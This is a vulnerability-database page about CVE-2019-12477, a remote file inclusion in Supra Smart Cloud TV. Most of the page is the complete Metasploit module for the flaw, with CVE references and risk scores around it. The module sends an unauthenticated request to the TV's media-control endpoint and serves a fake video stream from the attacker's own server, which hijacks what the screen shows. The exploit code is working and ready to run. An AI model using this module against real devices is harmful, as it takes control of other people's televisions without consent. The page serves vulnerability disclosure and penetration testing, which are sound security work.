Supra Smart Cloud TV Remote File Inclusion

🗓️ 31 Aug 2024 00:00:00Reported by wvu, Dhiraj Mishra, metasploit.comType

packetstorm🔗 packetstormsecurity.com👁 224 Views

This module exploits an unauthenticated remote file inclusion in Supra Smart Cloud TV. Attacker can send a crafted request to broadcast a fake video

Reporter	Title	Published	Views	Family All 17
0day.today	Supra Smart Cloud TV - openLiveURL() Remote File Inclusion Vulnerability	7 Jun 201900:00	–	zdt
ATTACKERKB	Supra Smart Cloud TV Remote File Inclusion	11 Sep 201900:00	–	attackerkb
Circl	CVE-2019-12477	28 Jun 201917:20	–	circl
CNVD	Supra Smart Cloud TV Remote File Containment Vulnerability	11 Jun 201900:00	–	cnvd
CVE	CVE-2019-12477	7 Jun 201914:51	–	cve
Cvelist	CVE-2019-12477	7 Jun 201914:51	–	cvelist
Exploit DB	Supra Smart Cloud TV - 'openLiveURL()' Remote File Inclusion	6 Jun 201900:00	–	exploitdb
exploitpack	Supra Smart Cloud TV - openLiveURL() Remote File Inclusion	6 Jun 201900:00	–	exploitpack
Metasploit	Supra Smart Cloud TV Remote File Inclusion	7 Jun 201916:33	–	metasploit
myhack58	Smart TV and then exposed vulnerabilities--Supra Smart Cloud TV vulnerability can cause the device to be hijacking-vulnerability warning-the black bar safety net	10 Jun 201900:00	–	myhack58

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::Remote::HttpServer  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Supra Smart Cloud TV Remote File Inclusion',  
'Description' => %q{  
This module exploits an unauthenticated remote file inclusion which  
exists in Supra Smart Cloud TV. The media control for the device doesn't  
have any session management or authentication. Leveraging this, an  
attacker on the local network can send a crafted request to broadcast a  
fake video.  
},  
'Author' => [  
'Dhiraj Mishra', # Discovery, PoC, and module  
'wvu' # Module  
],  
'References' => [  
['CVE', '2019-12477'],  
['URL', 'https://www.inputzero.io/2019/06/hacking-smart-tv.html']  
],  
'DisclosureDate' => '2019-06-03',  
'License' => MSF_LICENSE  
)  
)  
  
deregister_options('URIPATH')  
end  
  
def run  
start_service('Path' => '/')  
  
print_status("Broadcasting Epic Sax Guy to #{peer}")  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => '/remote/media_control',  
'encode_params' => false,  
'vars_get' => {  
'action' => 'setUri',  
'uri' => get_uri + 'epicsax.m3u8'  
}  
)  
  
unless res && res.code == 200 && res.body.include?('OK')  
print_error('No doo-doodoodoodoodoo-doo for you')  
return  
end  
  
# Sleep time calibrated using successful pcap  
print_good('Doo-doodoodoodoodoo-doo')  
print_status('Sleeping for 10s serving .m3u8 and .ts files...')  
sleep(10)  
end  
  
def on_request_uri(cli, request)  
dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-12477')  
  
files = {  
'/epicsax.m3u8' => 'application/x-mpegURL',  
'/epicsax0.ts' => 'video/MP2T',  
'/epicsax1.ts' => 'video/MP2T',  
'/epicsax2.ts' => 'video/MP2T',  
'/epicsax3.ts' => 'video/MP2T',  
'/epicsax4.ts' => 'video/MP2T'  
}  
  
file = request.uri  
  
unless files.include?(file)  
vprint_error("Sending 404 for #{file}")  
return send_not_found(cli)  
end  
  
data = File.read(File.join(dir, file), mode: 'rb')  
  
vprint_good("Sending #{file}")  
send_response(cli, data, 'Content-Type' => files[file])  
end  
end  
`

31 Aug 2024 00:00Current

7.1High risk

Vulners AI Score7.1

CVSS 22.1

CVSS 35.5

EPSS0.33135